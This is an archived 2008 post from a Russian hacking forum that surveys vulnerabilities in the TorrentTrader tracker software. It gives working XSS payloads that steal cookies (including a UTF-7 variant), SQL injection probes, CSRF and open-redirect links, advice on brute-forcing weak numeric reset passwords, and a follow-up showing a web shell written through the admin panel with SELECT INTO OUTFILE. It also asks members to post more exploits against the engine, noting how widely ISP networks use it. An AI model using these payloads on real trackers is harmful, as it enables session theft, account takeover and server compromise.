ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
[ Обзор уязвимостей TorrentTrader ] |
27.07.2008, 04:18
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
[ Обзор уязвимостей TorrentTrader ]
Уязвимости TorrentTrader
Офф сайт разработчика: torrenttrader.org
На сегодняшний день последняя версия: FINAL v1.08 Notes(2008-06-17)
Скачать отсюда:
http://sourceforge.net/project/showfiles.php?group_id=98584&package_id=180927&rel ease_id=545219
TorrentTrader – набирающий популярность торрент движок по размещению и скачиванию торрентов.
Для начала рассмотрим публичные уязвимости под различные версии:
TorrentTrader 1.0 SQL Inject
Эксплойт: TorrentTrader 1.0 RC2 SQL Injection © By aCiDBiTS
TorrentTrader Classic v1.07
Тут у нас пару XSS от хакиря «HACKERS PAL»
Примеры:
Код:
http://site.com/tracker/pjirc/css.php?color=<script>alert(document.cookie);</script>
Код:
http://site.com/tracker/browse.php?cat=<script>alert(document.cookie);</script>
TorrentTrader Classic Edition 1.08
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" в сценарии account-inbox.php. Удаленный пользователь может с помощью специально сформированного частного сообщения выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
http://site.com/tracker/account-inbox.php?msg=<script>alert('XSS')</script>
2. Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед отправкой частного сообщения. Удаленный пользователь может с помощью специально сформированной ссылки отправить произвольное сообщение пользователям приложения.
Пример:
Код:
http://site.com/tracker/account-inbox.php?msg=<message>&receiver=<username>
3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "url" в сценарии redirect.php. Злоумышленник может с помощью специально сформированной ссылки перенаправить пользователя на потенциально небезопасный сайт.
Пример:
Код:
http://site.com/tracker/redirect.php?url=http://remote_host/evil.php
Баги обнаружены 03 марта, 2008 © securitylab.ru
TorrentTrader версии 1.08 до 17.06.2008
1. Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах "email" и "wantusername" в сценарии account-signup.php и в параметре "receiver" в сценарии account-inbox.php (когда установлен параметр "msg"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
Код:
http://site.com/tracker/account-signup.php?wantusername=’
Код:
http://site.com/tracker/account-signup.php?email=’
Код:
http://site.com/tracker/account-inbox.php?msg=’
Баги обнаружены 18 июня, 2008 © securitylab.ru
++++++++++++++
Теперь поинтереснее, баги найденные модератором античата gibson`om, для:
TorrentTrader v2.04:
1. Раскрытие пути и системная информация
check.php
ps если админ его не удалил, а то маячит в админке, так что не вариант, что файл будет на сайте.
2. Слабый пароль.
Меняем пасс через востановление и пасс меняется в диапозоне 10000 до 50000 только цифры. Можно написать брут на перле имхо идеальный вариант будет и перебрутить пасс.
ps Нужно мыло пользователя!
3. Возможно "тырить" бекап бд
backup-database.php buckup будет в /backups в формате
$db-$year$month$day-$hour$min.gz
ps если знаем название базы.
4. Xss
В сообщениях все фильтруется, но если используется кодировка utf 7, то все поля подверженны ксс.
Код:
+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-
В админке везде ксс, практически ничего не фильтруется.
xss при отправке репорта ([Report Torrent]), отправляем мессагу вставляем любые теги (активка). Мессага пойдет админу!
[c] gibson
++++++++++++++
Ну и далее пару мелких багов найденных мною.
TorrentTrader Classic Edition 1.08
XSS:
Код:
http://site.com/tracker/account-inbox.php?receiver=<script>alert('Nightmare')</script>
Далее установил последнюю версию:
FINAL v1.08 Notes(2008-06-17) (скачал сегодня)
Наткнулся на раскрытие пути:
Код:
http://site.com/tracker/torrents-search.php?search=&cat[]=
Код:
http://site.com/tracker/torrents-details.php?id[]=
Поиск багов в прогрессе… ©
Кто ещё чем сможет дополнить, просьба публиковать различные сплойты, публичные, или найденные вами дырки.
Как показывают опросы, этот движок пользуется спросом в локалках разных провайдеров, так что… так..
|
|
|
27.07.2008, 14:43
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Заливка шелла через админку в последней версии FINAL v1.08 Notes(2008-06-17)
Идём в раздел "Database\База данных"
Далее выполняем SQL запрос:
Код:
SELECT '<? echo "shell"; ?>' FROM users INTO OUTFILE "/home/localhost/www/tt/shell.php"
Запрос выполняется замечательно.
Далее, войти в админку можно утащив куки с помощью XSS, а получить полный путь до файла можно с помощью раскрытия пути.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
